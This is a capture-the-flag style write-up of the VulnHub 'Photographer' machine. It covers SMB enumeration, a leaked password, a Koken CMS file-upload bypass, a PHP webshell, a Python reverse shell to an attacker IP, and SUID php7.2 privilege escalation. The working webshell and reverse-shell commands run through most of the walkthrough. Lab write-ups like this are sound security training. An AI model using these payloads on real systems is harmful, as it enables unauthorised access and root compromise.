Writeup for Photographer machine form vulnhub

Machine	Photographer
Vulnerability	Arbitrary File Upload (Authenticated).
Explanation	The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
Privilige Escalation Vulnerability	SUID binary abuse.
Explanation	/usr/bin/php7.2 has the SUID bit set, which allows a non-root user to run command as root using the -r switch.

Enumeration

Nmap scan

I started with an nmap scan which revealed four open ports.

$ nmap 192.168.56.104 -sV -sC

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))

SMB Enumeration

I used smbclient to enumerate the SMB server running on port 445. I started off by listing it’s shares.

$ smbclient -L 192.168.56.104 -N

I found a share named sambashare, which I was able to access anonymously.

$ smbclient //192.168.56.104/sambashare -N
smb: \> ls

There was two files mailsent.txt and wordpress.bkp.zip.
I downloaded them both.

smb: \> get mailsent.txt
smb: \> get wordpress.bkp.zip

mailsent.txt contained an email with its headers.

$ cat mailsent.txt 
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

It didn’t seem important at first, but there was a use for it later on.

The other file wordpress.bkp.zip did not contain anything important.

Web Enumeration

There was two apache web servers running on port 80 and port 8000.

Port 80 :

I browsed to the first one, but I did not find anything useful.
I also did not find any hidden resources using gobuster.

So, I moved to the next one.

Port 8000 :

This is The home page of the web server running on port 8000.

I used gobuster to find any hidden resources.

$ gobuster dir -u http://192.168.56.104:8000 \
--status-codes-blacklist 404,403 \
--exclude-length 0 \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt

–exclude-length 0: exclude the following content length (completely ignores the status)

I was able to find an admin portal on /admin.

The credentials I used to login were found on mailsent.txt I retrieved from the sambashare share.

Email address: daisa@photographer.com
Password: babygirl

This is Koken Content Management System (CMS) which is vulnerable to an Arbitrary File Upload in case of an authenticated user.

To exploit this vulnerability I used an exploit found at exploit-db.

Initial Foothold

I created a php script and saved it as image.php.jpg.

$ echo '<?php system($_GET["cmd"]);?>' > image.php.jpg

I went back to the admin page, clicked on import content at the bottom right of the page, uploaded image.php.jpg, and sent the requst to burpsuite.

I changed the name to image.php, and forwarded the request.

After the upload is done, I went back the koken CMS Library, selected The newly uploaded file, right clicked on Download File and copied the link.

To test it I used curl and sent a request to the link I copied, and I got a response with the output of the command I provided as a query.

$ curl http://192.168.56.104:8000/storage/originals/43/f5/image.php?cmd=id

After getting a working webshell, I tried to get a reverse shell.

Reverse shell

To get a reverse shell I used this python payload found here.

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.105",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I started a listener using netcat.

$ nc -lnvp 1337

I executed the payload with the webshell.

$ curl 'http://192.168.56.104:8000/storage/originals/43/f5/image.php?cmd=python3%20%2Dc%20%27import%20socket%2Cos%2Cpty%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22192%2E168%2E56%2E105%22%2C1337%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3Bos%2Edup2%28s%2Efileno%28%29%2C1%29%3Bos%2Edup2%28s%2Efileno%28%29%2C2%29%3Bpty%2Espawn%28%22%2Fbin%2Fsh%22%29%27'

And I got a connection back on the nc listener.

To get a fully functioning shell I stabilized it using the folloing commands.

$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=xterm
$ ^Z (CTRL+Z)
kali$ stty raw -echo; fg

After stabilizing the shell, I got the user flag.

$ cd /home/daisa
$ cat user.txt

Privilige Escalation

I listed all files with the SUID bit set, to see if there is a binary a can use to escalate my priviliges.

$ find / -type f -perm -u=s 2>/dev/null

The intersting binary I found was /usr/bin/php7.2.

php can be used to excalate priviles according to GTFOBins.

I used the following command to get a shell as root.

$ php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"

After that I got the root flag.

$ cd /root
$ cat proof.txt